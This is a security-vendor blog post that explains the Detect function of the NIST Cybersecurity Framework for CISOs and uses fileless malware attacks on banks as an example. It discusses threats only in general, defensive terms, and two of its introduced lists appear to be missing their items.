Enterprise chief information security officers have their work cut out for them in the current threat landscape. As attack and infection strategies become more complex and difficult to predict, the business’s CISO must ensure that the organization’s most critical information assets and the systems that support them are secure.
In order to create more cohesive and universal standards of protection, the National Institute of Standards and Technology established its Framework for Improving Critical Infrastructure Cybersecurity. This framework includes five key functions and associated categories for CISOs and their stakeholders to follow.
In the Part 1 and Part 2 of this series, we examined the first function, Identify, as well as the Protect function. Today, we’ll take a closer look at Detect, the third function in the framework, as well as what responsibilities CISOs have according to this step in the NIST Cybersecurity Framework.
Detect: NIST definition
The first two functions of the framework encompass establishing adequate understanding of the current infrastructure as well as the risks that can impact these systems. From here, CISOs should put the necessary protections in place to support the continuous delivery of critical services.
As Compass IT Compliance contributor Geoff Yeagley noted, the Identify function can be thought of as the foundation, with the Protect function serving as the framing.
“Once you have your house built, you need to put some items in your house to alert you to any pending danger or threats,” Yeagley wrote. “These could be things like smoke detectors, carbon monoxide detectors and home alarm systems. Using that same analogy of building a house this would be the Detect function of the core.”
NIST defines the Detect function as the development and implementation of activities “to identify the occurrence of a cybersecurity event,” with a focus on supporting the timely discovery of such events.
Categories under Detect
As many experts including Yeagley note, this function is relatively straightforward. While this surely does not make it any less important than the other functions of the framework, this function does include fewer associated categories. Let’s take a look:
It’s important to keep in mind that it’s not only about detecting the type of suspicious activity that could point to an infection or attack, but also doing so in a timely manner. Currently, hackers are able to fly under the radar for over 100 days before being detected, with some events lasting over 400 days. This gives attackers plenty of time to infect siloed areas of the business and make off with stolen data assets. In this way, it’s imperative that CISOs give the Detect function, and its focus on timeliness, the appropriate attention and effort.
Detection in the real world: Fileless malware
In today’s threat environment, the ability to quickly detect suspicious activity is absolutely key. A recent example that shows this critical importance comes in the form of fileless malware, which has been put to work in ransomware and a range of other types of attacks.
Trend Micro reported on fileless malware in 2017, explaining that similar to other attacks, fileless malware looks to take advantage of system vulnerabilities, but is created with another expressed purpose: to operate in the background and be undetectable to system security measures. In this way, hackers are able to draw out the length of the attack, and potentially breach and steal increasingly sensitive platforms and data assets.
“Current security solutions detect an intrusion based on a malware file’s signature characteristics,” Trend Micro stated in its Simply Security blog. “However, because fileless malware doesn’t have a payload file to infect a system, security applications don’t know what to look for. In addition, this threat uses a system’s own commands to execute the attack, which might not be considered in traffic and behavior monitoring efforts.”
One of the most notable campaigns leveraging fileless malware impacted more than 100 banks and financial service providers across the globe – in one instance, the infection was only discovered when a bank’s security team investigated the physical memory of their Microsoft domain controller. In addition to internal banking systems, hackers also unleashed the fileless malware attack on eight Russian ATMs, allowing attackers to take control of the machines’ capabilities and steal more than $800,000.
Detection lessons of fileless malware
One of the biggest lessons taught by fileless malware is that it no longer takes written or downloaded malicious files forcing execution of a payload within infected local disks – attackers can instead target system memory or registry, injecting the payload there or running scripts within a whitelisted application to enable an attack. In instances of the latter, hackers utilize the legitimacy of tools like PowerShell within the .NET framework because of its scope, accessibility and ability to virtually access different APIs.
CISOs: Leverage a proactive Detect strategy
While difficult, it isn’t impossible to guard against advanced threats like fileless malware – it does, however, require a proactive approach that can be used alongside and aligned with the standards of the Detect function. As Trend Micro Researcher Marvin Cruz noted, proactive security should include measures like:
“We are in a global cyber arms race,” said Ed Cabrera, Trend Micro Chief Cybersecurity Officer. “The explosive growth of criminal innovation and automation requires an in kind response from CISOs and their teams. Speeding up quality detection through a layered connected threat defense is paramount.”
Through the intelligent identification of risks, implementation of security measures to ensure critical functions and timely detection of threats, enterprises can considerably improve protections of their most critical IT assets. But efforts shouldn’t stop here – check in later for the next parts of our series, where we’ll discuss the Respond and Recover functions.